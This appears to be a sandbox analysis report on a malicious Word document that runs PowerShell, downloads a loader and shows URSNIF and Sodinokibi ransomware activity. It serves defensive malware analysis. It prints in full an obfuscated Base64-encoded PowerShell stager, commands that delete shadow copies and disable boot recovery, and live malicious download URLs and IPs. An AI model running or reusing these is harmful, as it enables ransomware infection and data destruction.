| File name: | info_17.07.doc |
| Full analysis: | https://app.any.run/tasks/b82494d0-5f81-4a4c-b0fa-84c6d88e1280 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | July 17, 2019, 11:35:05 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: kmpfeasehdkgzczvykoqteekl, Subject: fmupxymxyqxqmytcgdllcpopjg, Comments: xyghftkvgkrfmucd, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Tue Jul 16 21:40:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5: | 70D38D27BB438DD5712A942BCDE3378F |
| SHA1: | E184ED54102D237E1DA605FAF2BD451FEE5D1CA4 |
| SHA256: | C1A4878CBD32046E2FD73BBD910C62354C22BA5E53F10451420FD2F7E778A90C |
| SSDEEP: | 768:Ez+jGjZE2kXC8954mXbYhQ2F+JOXvfjhqML7I3livNe+NotIgUdS37e3yrPkQK7h:E6jGjrm5Xfh83jhVs3sE+No2g97Cy2/ |
MALICIOUS
Executes PowerShell scripts
- WINWORD.EXE (PID: 3540)
URSNIF was detected
- powershell.exe (PID: 2940)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3540)
Application was dropped or rewritten from another process
- aGpPDP.exe (PID: 3840)
Downloads executable files from the Internet
- powershell.exe (PID: 2940)
Sodinokibi keys found
- powershell.exe (PID: 3716)
Dropped file may contain instructions of ransomware
- powershell.exe (PID: 3716)
Deletes shadow copies
- cmd.exe (PID: 3396)
Renames files like Ransomware
- powershell.exe (PID: 3716)
Starts BCDEDIT.EXE to disable recovery
- cmd.exe (PID: 3396)
Sodinokibi ransom note found
- powershell.exe (PID: 3716)
Changes settings of System certificates
- powershell.exe (PID: 3716)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 2940)
- powershell.exe (PID: 3716)
Executable content was dropped or overwritten
- powershell.exe (PID: 2940)
Application launched itself
- powershell.exe (PID: 2940)
Executes PowerShell scripts
- powershell.exe (PID: 2940)
Executed via COM
- unsecapp.exe (PID: 324)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 3716)
Creates files like Ransomware instruction
- powershell.exe (PID: 3716)
Creates files in the program directory
- powershell.exe (PID: 3716)
Executed as Windows Service
- vssvc.exe (PID: 3684)
Adds / modifies Windows certificates
- powershell.exe (PID: 3716)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3540)
Creates files in the user directory
- WINWORD.EXE (PID: 3540)
Reads settings of System Certificates
- powershell.exe (PID: 2940)
- powershell.exe (PID: 3716)
Application was crashed
- aGpPDP.exe (PID: 3840)
Dropped object may contain TOR URL's
- powershell.exe (PID: 3716)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | kmpfeasehdkgzczvykoqteekl |
|---|---|
| Subject: | fmupxymxyqxqmytcgdllcpopjg |
| Author: | - |
| Keywords: | - |
| Comments: | xyghftkvgkrfmucd |
| Template: | Normal |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:04:25 21:21:00 |
| ModifyDate: | 2019:07:16 20:40:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Manager: | - |
| Company: | - |
| Bytes: | 22528 |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 1 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: |
|
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
54
Monitored processes
10
Malicious processes
4
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 324 | C:\Windows\system32\wbem\unsecapp.exe -Embedding | C:\Windows\system32\wbem\unsecapp.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Sink to receive asynchronous callbacks for WMI client application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1924 | vssadmin.exe Delete Shadows /All /Quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2532 | bcdedit /set {default} recoveryenabled No | C:\Windows\system32\bcdedit.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Boot Configuration Data Editor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2940 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAUgBiADQASQB3AEYASQBYAGYAbAArAHcALwA5AEkARwBsAEUARwBjAEoARABxAE4AQwB5AEwASwBJAE0AVwBRAEcAagBiAHEANABaAEYAdABpAHcAUQBMAGQAQwBtADEAbwBGAFIAbgB4AHYANAA4AGwANgB2AFoAeQA3ADgAcwA1ADkANQA3AHYAYQBFAEUAZABDAFAAeQA4AEEAaAA2AEEAZQBDAG8AVwAvAGcASwA2ADIAbwB1AG8AeABHAGIAagBhAGEAUQA0AE8ASAB0AEoAUwBsAEgAeQBoAEQATABTAGcAZQArAHcAbwA1ADAATgBIAFkAagBJAGsAYgBSAGkAYgBpAGUAagBsADUAMgBIAGQARgBqAEEARABpAFIAVgBsADcAYwByACsAaQBTAHgAZwBnAFkASQB5AFgAYQA5AFIAUgBzAFMAYgBjAGMAegBTAHMASwAxAHEAeAAzADIAUwAzAC8AKwA5AEQAMwAyAFkASwBhAFUAYwBFAHcAegBpAFgARgBlAE0AMABaAG8AVgBPAEsATQA1AGsAaAB4AFkAYwBxADYANABtAGEAUwBjAGwANABoAGsAWQBsAEgANQB1ADIATwBNAGMATgBTADkAbABGADYAWgBCAEIASgB3AGEAagBTADQAUgAwADAAMwBJAFMAWABCAE0AZQBaAHIAZwBVAEwAawBkAHMAaAAzAFEAQgBhAGcATwBzAFQAbwAxAEYAbAAzAFoAdwBqAEkAcAA5AFgASQBlAFAAWQBUAHcASQAyACsAVABQAGMAZwB6AE8AdgA0AFEAWQBKADAAUABVAFcAWgBFAHAAVQBOADIAZwBwAEYARwBsAEgAMwBtAEoAYwBGAEkAaABOAHcAcQBuAEsAUQBEAGMAbABvAEQAYwBhAEQAQQB6AFEAdgBQAGsAVQBwAHcAVwBYAGkAcwBZAFMATABVAG8AZQBFAHkAawAvAEgARwBlADEAeABrAHUAbABYAHkAOQBIAGIAYwBvAHYAOQAzAFMASwBzAFkAcQB6ADUAbgBSAHkAUQBUAEIANQAxAGYAOABGAEsAMgBaAHoANwBLADkAVQBHAFIAUwBwAGYAbQBuAEcARwB2AGEAUgBOAFgAcABBAGwAbQAyAGgAbgBqADAAMABVAC8AbgBiAEIAagBRAE0AOQAvAGIAbQBCAHcAPQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEAZAB0AG8AZQBuAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcARQAnACAAKwAgACcAWAAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3396 | "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3540 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_17.07.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3684 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3716 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAUgBiADQASQB3AEYASQBYAGYAbAArAHcALwA5AEkARwBsAEUARwBjAEoARABxAE4AQwB5AEwASwBJAE0AVwBRAEcAagBiAHEANABaAEYAdABpAHcAUQBMAGQAQwBtADEAbwBGAFIAbgB4AHYANAA4AGwANgB2AFoAeQA3ADgAcwA1ADkANQA3AHYAYQBFAEUAZABDAFAAeQA4AEEAaAA2AEEAZQBDAG8AVwAvAGcASwA2ADIAbwB1AG8AeABHAGIAagBhAGEAUQA0AE8ASAB0AEoAUwBsAEgAeQBoAEQATABTAGcAZQArAHcAbwA1ADAATgBIAFkAagBJAGsAYgBSAGkAYgBpAGUAagBsADUAMgBIAGQARgBqAEEARABpAFIAVgBsADcAYwByACsAaQBTAHgAZwBnAFkASQB5AFgAYQA5AFIAUgBzAFMAYgBjAGMAegBTAHMASwAxAHEAeAAzADIAUwAzAC8AKwA5AEQAMwAyAFkASwBhAFUAYwBFAHcAegBpAFgARgBlAE0AMABaAG8AVgBPAEsATQA1AGsAaAB4AFkAYwBxADYANABtAGEAUwBjAGwANABoAGsAWQBsAEgANQB1ADIATwBNAGMATgBTADkAbABGADYAWgBCAEIASgB3AGEAagBTADQAUgAwADAAMwBJAFMAWABCAE0AZQBaAHIAZwBVAEwAawBkAHMAaAAzAFEAQgBhAGcATwBzAFQAbwAxAEYAbAAzAFoAdwBqAEkAcAA5AFgASQBlAFAAWQBUAHcASQAyACsAVABQAGMAZwB6AE8AdgA0AFEAWQBKADAAUABVAFcAWgBFAHAAVQBOADIAZwBwAEYARwBsAEgAMwBtAEoAYwBGAEkAaABOAHcAcQBuAEsAUQBEAGMAbABvAEQAYwBhAEQAQQB6AFEAdgBQAGsAVQBwAHcAVwBYAGkAcwBZAFMATABVAG8AZQBFAHkAawAvAEgARwBlADEAeABrAHUAbABYAHkAOQBIAGIAYwBvAHYAOQAzAFMASwBzAFkAcQB6ADUAbgBSAHkAUQBUAEIANQAxAGYAOABGAEsAMgBaAHoANwBLADkAVQBHAFIAUwBwAGYAbQBuAEcARwB2AGEAUgBOAFgAcABBAGwAbQAyAGgAbgBqADAAMABVAC8AbgBiAEIAagBRAE0AOQAvAGIAbQBCAHcAPQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEAZAB0AG8AZQBuAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcARQAnACAAKwAgACcAWAAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3840 | "C:\Users\admin\aGpPDP.exe" | C:\Users\admin\aGpPDP.exe | powershell.exe | ||||||||||||
User: admin Company: Clearleap Coolwent Integrity Level: MEDIUM Description: Might Quick Sud Exit code: 3221225477 Version: 11.1.60.40 Modules
| |||||||||||||||
| 3844 | bcdedit /set {default} bootstatuspolicy ignoreallfailures | C:\Windows\system32\bcdedit.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Boot Configuration Data Editor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
2 017
Read events
1 461
Write events
551
Delete events
5
Modification events
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | 2i$ |
Value: 32692400D40D0000010000000000000000000000 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1324417054 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1324417168 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1324417169 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: D40D00004EF345B8933CD50100000000 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | kj$ |
Value: 6B6A2400D40D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | kj$ |
Value: 6B6A2400D40D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3540) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
1
Suspicious files
172
Text files
6
Unknown types
9
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD532.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I2BB0GL51A4NT6OFZS73.temp | — | |
MD5:— | SHA256:— | |||
| 3716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DSW3OZ6QBRX35Q1Q2K2.temp | — | |
MD5:— | SHA256:— | |||
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA9F380A455BD38AD.TMP | — | |
MD5:— | SHA256:— | |||
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFABD9CDED8697DF47.TMP | — | |
MD5:— | SHA256:— | |||
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3E5DA4405F41F42D.TMP | — | |
MD5:— | SHA256:— | |||
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:— | SHA256:— | |||
| 2940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17df05.TMP | binary | |
MD5:— | SHA256:— | |||
| 3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$fo_17.07.doc | pgc | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
20
DNS requests
15
Threats
8
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2940 | powershell.exe | GET | 200 | 185.193.141.248:80 | http://185.193.141.248/gs.php | RU | text | 406 b | suspicious |
3716 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 56.3 Kb | whitelisted |
2940 | powershell.exe | GET | 200 | 185.193.141.146:80 | http://fcamylleibrahim.top/sywo/fgoow.php?l=dxclass5.gxl | RU | executable | 574 Kb | malicious |
3716 | powershell.exe | GET | 200 | 185.193.141.248:80 | http://185.193.141.248/gs.php | RU | text | 406 b | suspicious |
3716 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E.crt | US | der | 993 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2940 | powershell.exe | 185.193.141.146:80 | fcamylleibrahim.top | IT Mir LLC | RU | suspicious |
2940 | powershell.exe | 185.193.141.248:80 | — | IT Mir LLC | RU | suspicious |
2940 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3716 | powershell.exe | 185.193.141.248:80 | — | IT Mir LLC | RU | suspicious |
— | — | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3716 | powershell.exe | 208.113.140.37:443 | production-stills.co.uk | New Dream Network, LLC | US | unknown |
3716 | powershell.exe | 94.231.107.137:443 | trivselsguide.dk | Zitcom A/S | DK | suspicious |
3716 | powershell.exe | 95.143.172.245:443 | tilldeeke.de | rh-tec Business GmbH | DE | suspicious |
3716 | powershell.exe | 104.27.175.164:443 | martinipstudios.com | Cloudflare Inc | US | shared |
3716 | powershell.exe | 93.184.221.240:80 | www.download.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
fcamylleibrahim.top |
| malicious |
pastebin.com |
| malicious |
trivselsguide.dk |
| suspicious |
production-stills.co.uk |
| suspicious |
logosindustries.com |
| suspicious |
www.logosindustries.com |
| malicious |
tilldeeke.de |
| malicious |
martinipstudios.com |
| unknown |
soundseeing.net |
| suspicious |
www.download.windowsupdate.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1064 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2940 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2940 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2940 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2940 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
2940 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3716 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell DownloadString Command Common In Powershell Stagers |
1 ETPRO signatures available at the full report